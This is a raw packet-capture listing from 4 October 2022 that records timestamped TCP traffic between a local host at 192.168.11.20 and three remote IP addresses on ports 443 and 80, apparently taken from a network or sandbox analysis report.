                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118597984 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118705988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118758917 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118788004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.118980885 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119107008 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119126081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119201899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119221926 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119381905 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119389057 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119505882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119533062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119693041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119808912 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119834900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119940042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.119976997 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120003939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120085955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120127916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120287895 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120331049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120353937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120420933 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120439053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120671034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120763063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120784044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120837927 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120851994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.120913982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.121203899 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.157083035 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.200565100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:06.200623035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:10.195000887 CEST8049834109.206.241.33192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:10.195142031 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.472968102 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.473038912 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.473172903 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.473608017 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.473644018 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.516671896 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.516990900 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.520658970 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.520672083 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.520955086 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.521078110 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.521476984 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.562473059 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.844990015 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845210075 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845304012 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845340014 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845361948 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845557928 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845576048 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845602036 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845798016 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.845844984 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846009016 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846050978 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846239090 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846245050 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846282005 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846589088 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846621990 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846645117 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.846967936 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847009897 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847054005 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847196102 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847210884 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847248077 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847415924 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847443104 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847469091 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847629070 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847667933 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847826004 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847954988 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847964048 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.847989082 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848047018 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848172903 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848215103 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848361015 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848370075 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848397970 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848553896 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848577976 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848604918 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848797083 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848933935 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848949909 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848953009 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.848974943 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849144936 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849186897 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849354029 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849373102 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849399090 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849415064 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849435091 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849688053 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849781990 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849812984 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849828959 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849848986 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.849970102 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850065947 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850138903 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850157022 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850171089 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850195885 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850234032 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850403070 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850421906 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850450039 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850497007 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850634098 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850656033 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850682974 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850836039 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850841999 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850873947 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.850969076 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.851058006 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.856921911 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857103109 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857137918 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857172012 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857239962 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857399940 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857424021 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857434034 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857466936 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857645988 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857678890 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857698917 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857883930 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857950926 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.857990026 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858175039 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858382940 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858453035 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858516932 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858625889 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858665943 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858741045 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858922958 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858944893 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.858968019 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859004021 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859163046 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859267950 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859291077 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859332085 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.859628916 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868045092 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868213892 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868242979 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868349075 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868371964 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868380070 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868391991 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868577003 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868577957 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868596077 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868604898 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868613958 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868628979 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868745089 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868772984 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868792057 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868810892 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868959904 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868966103 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.868989944 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869095087 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869110107 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869142056 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869165897 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869290113 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869352102 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869484901 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869512081 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869610071 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869702101 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869749069 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869771957 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869798899 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869812012 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869834900 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869848013 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869946003 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869961977 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869968891 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869983912 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.869999886 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870002985 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870060921 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870141983 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870168924 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870177031 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870187044 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870203018 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870235920 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870260000 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870331049 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870358944 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870367050 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870377064 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870384932 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870393038 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870398998 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870405912 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870429039 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870488882 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870583057 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870588064 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870613098 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870723963 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870728016 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870735884 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870753050 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870866060 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870912075 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.870934010 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871043921 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871068954 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871076107 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871153116 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871179104 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871208906 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871217966 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871330976 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871344090 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871356010 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871361017 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871370077 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871376991 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871496916 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871551991 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871572018 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871684074 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871685982 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871720076 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871728897 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871839046 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871913910 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871922970 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871927023 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871937037 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.871994019 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872021914 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872042894 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872050047 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872091055 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872097015 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.872189999 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.889475107 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.889518023 CEST44349837104.21.25.158192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.889817953 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.889830112 CEST49837443192.168.11.20104.21.25.158
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.889832973 CEST49837443192.168.11.20104.21.25.158
